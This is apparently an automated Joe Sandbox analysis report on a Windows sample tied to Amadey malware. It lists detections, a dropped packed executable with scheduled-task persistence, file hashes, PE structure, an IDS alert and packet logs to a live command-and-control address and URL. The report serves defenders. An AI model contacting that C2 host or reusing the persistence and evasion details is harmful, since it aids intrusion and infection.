                  File and Directory Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow224
                  System Information Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe100%AviraTR/Crypt.TPM.Gen
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe58%ReversingLabsWin32.Packed.Themida

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://185.215.113.16/Jo89Ku7d/index.phpded100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php:100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpX100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpD100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php8100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php32100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpi100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php100%Avira URL Cloudmalware
                  http://185.215.113.16/Jo89Ku7d/index.php3100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phph100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpp100%Avira URL Cloudphishing

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  time.windows.com
                  		unknown
                  		unknownfalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://185.215.113.16/Jo89Ku7d/index.phptrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.16/Jo89Ku7d/index.php32axplong.exe, 00000004.00000002.2605243731.0000000000DCB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.php:axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpdedaxplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpiaxplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.php8axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpXaxplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phphaxplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpDaxplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.php3axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.16/Jo89Ku7d/index.phppaxplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    185.215.113.16
                    		unknownPortugal
                    		206894WHOLESALECONNECTIONSNLtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1519852
                    Start date and time:2024-09-27 01:27:05 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 44s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:9
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@4/3@2/1
                    EGA Information:
                    • Successful, ratio: 33.3%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 40.119.6.228, 20.101.57.9
                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target axplong.exe, PID 712 because there are no executed function
                    • Execution Graph export aborted for target file.exe, PID 6752 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    01:28:10Task SchedulerRun new task: axplong path: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                    19:29:00API Interceptor652990x Sleep call for process: axplong.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.215.113.16file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadey, DarkTortillaBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadey, Go Injector, XWormBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadey, DarkTortillaBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1942016
                    Entropy (8bit):7.948905481440068
                    Encrypted:false
                    SSDEEP:49152:NH09SO0SzQIL/QU3TR7u9ZlxJd3dbjJ1Qs/vVhkE+:NH09SOtVL/pTUZdd3mmSE+
                    MD5:544CA28AA15B5ED1C6EE914B09E6F3C2
                    SHA1:4B1A98399C63E9B3220CFB4B7F23F4297FAE6365
                    SHA-256:1AF2F5A32AD1DB3AD373935626A38CC897EC5B717A43EC7DC2D3E507F034AA7D
                    SHA-512:6B6F1E113BB1DE11CAA4F7D287FA7C31A1B79C127EEF99F315FF27EA06C4AE7FEA93D80A7E5A0A06FEA27347359F6D766956AECC4573B22C4A9CE812BCE1E4FC
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 58%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................M...........@..........................0M.....<^....@.................................W...k.............................L.............................4.L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...fhovjjjc.....`2.....................@...tlwinqqe......L......z..............@....taggant.0....M.."..................@...........................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0

                    C:\Windows\Tasks\axplong.job

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):308
                    Entropy (8bit):3.5071267581007395
                    Encrypted:false
                    SSDEEP:6:93SzsQZX2JUEZ+lX1lOJUPelkDdtcVAkXIEZ8MlW8+y0lbout0:9Czzl2JQ1lOmeeDhkXd8kX+VMut0
                    MD5:AAB9786FCEAB4E94EB39189F613B3F44
                    SHA1:F9BAD97F936AC86BBC6A7A7D53A56EB2F8E1FF3F
                    SHA-256:52FCC92ACF3A740B725A10862C6201B2041A74BC7D9754CC48C56BB63939F22D
                    SHA-512:E571B145979BA7B3580DFBB44492891A2D0B6E62C9B21C5865F9EA2DE83292D2D07AF1AF3DFCDD0E45F595003028983FBECB900847E0EE294DE91728F2848E95
                    Malicious:false
                    Reputation:low
                    Preview:.......Nr..N..aVB...F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0...................@3P.........................

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.948905481440068
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'942'016 bytes
                    MD5:544ca28aa15b5ed1c6ee914b09e6f3c2
                    SHA1:4b1a98399c63e9b3220cfb4b7f23f4297fae6365
                    SHA256:1af2f5a32ad1db3ad373935626a38cc897ec5b717a43ec7dc2d3e507f034aa7d
                    SHA512:6b6f1e113bb1de11caa4f7d287fa7c31a1b79c127eef99f315ff27ea06c4ae7fea93d80a7e5a0a06fea27347359f6d766956aecc4573b22c4a9ce812bce1e4fc
                    SSDEEP:49152:NH09SO0SzQIL/QU3TR7u9ZlxJd3dbjJ1Qs/vVhkE+:NH09SOtVL/pTUZdd3mmSE+
                    TLSH:0A9533AE52C4473BE3436F3F8965F9B9EFEFC42485181032EB4E66EAD50A51CC4A6710
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

                    File Icon

                    Icon Hash:00928e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0x8d0000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                    Entrypoint Preview

                    Instruction
                    jmp 00007F865CEE924Ah
                    jo 00007F865CEE9263h
                    add byte ptr [eax], al
                    jmp 00007F865CEEB245h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4ce2840x10fhovjjjc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x4ce2340x18fhovjjjc
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x680000x2de003fbe2d53bac981b92092e24e571f68f8False0.9971315139645777data7.976264378298446IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x690000x1e00x20031291c5676126d6072b2740eec5f0b1eFalse0.580078125data4.458154068548417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x6b0000x2bb0000x2002cd7f97eee1fcd8f4a4b728974e6c3d8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    fhovjjjc0x3260000x1a90000x1a860014ff4af6453ef4d169e4507242ff5d14False0.994316089837997data7.95414237718118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    tlwinqqe0x4cf0000x10000x6002598b8a3761c86a68cf15f1a7d4b4597False0.576171875data4.983374135333367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x4d00000x30000x22008f413e51de559a41ec83c176fd738210False0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_MANIFEST0x4ce2940x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                    Imports

                    DLLImport
                    kernel32.dlllstrcpy

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-09-27T01:29:16.039993+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.749718185.215.113.1680TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Sep 27, 2024 01:29:02.123615026 CEST4970680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:02.128493071 CEST8049706185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:02.128741026 CEST4970680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:02.128978968 CEST4970680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:02.133794069 CEST8049706185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:02.843842983 CEST8049706185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:02.846317053 CEST4970680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:02.871293068 CEST4970680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:02.876080990 CEST8049706185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:03.102998972 CEST8049706185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:03.103070974 CEST4970680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:03.206474066 CEST4970680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:03.206760883 CEST4970780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:03.211668968 CEST8049706185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:03.211710930 CEST8049707185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:03.211801052 CEST4970780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:03.211853027 CEST4970680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:03.211956978 CEST4970780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:03.216751099 CEST8049707185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:03.922878027 CEST8049707185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:03.923010111 CEST4970780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:03.923852921 CEST4970780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:03.929704905 CEST8049707185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:04.152101994 CEST8049707185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:04.152175903 CEST4970780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:04.253611088 CEST4970780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:04.254002094 CEST4970980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:04.260205030 CEST8049709185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:04.260294914 CEST4970980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:04.260428905 CEST8049707185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:04.260428905 CEST4970980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:04.260487080 CEST4970780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:04.265317917 CEST8049709185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:05.128912926 CEST8049709185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:05.128994942 CEST4970980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:05.129687071 CEST4970980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:05.134497881 CEST8049709185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:05.354912996 CEST8049709185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:05.355047941 CEST4970980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:05.459028006 CEST4970980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:05.459485054 CEST4971080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:05.464092970 CEST8049709185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:05.464147091 CEST4970980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:05.464298010 CEST8049710185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:05.464360952 CEST4971080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:05.464993954 CEST4971080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:05.469789028 CEST8049710185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:06.154469967 CEST8049710185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:06.154597044 CEST4971080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:06.155379057 CEST4971080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:06.160124063 CEST8049710185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:06.611717939 CEST8049710185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:06.611816883 CEST4971080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:06.627655983 CEST8049710185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:06.627784967 CEST4971080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:06.722186089 CEST4971080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:06.722563028 CEST4971180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:06.727392912 CEST8049710185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:06.727406025 CEST8049711185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:06.727482080 CEST4971080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:06.727535963 CEST4971180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:06.727642059 CEST4971180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:06.732613087 CEST8049711185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:07.453269005 CEST8049711185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:07.453489065 CEST4971180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:07.454080105 CEST4971180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:07.459671974 CEST8049711185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:07.688414097 CEST8049711185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:07.688494921 CEST4971180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:07.800307989 CEST4971180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:07.800638914 CEST4971280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:07.805448055 CEST8049712185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:07.805465937 CEST8049711185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:07.805543900 CEST4971180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:07.805569887 CEST4971280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:07.805768967 CEST4971280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:07.810556889 CEST8049712185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:08.869272947 CEST8049712185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:08.869429111 CEST4971280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:08.869434118 CEST8049712185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:08.869484901 CEST4971280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:08.870712996 CEST4971280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:08.877681017 CEST8049712185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:09.128109932 CEST8049712185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:09.128249884 CEST4971280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:09.238482952 CEST4971280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:09.238795996 CEST4971380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:09.243626118 CEST8049713185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:09.243659973 CEST8049712185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:09.243691921 CEST4971380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:09.243726969 CEST4971280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:09.243869066 CEST4971380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:09.248682022 CEST8049713185.215.113.16192.168.2.7
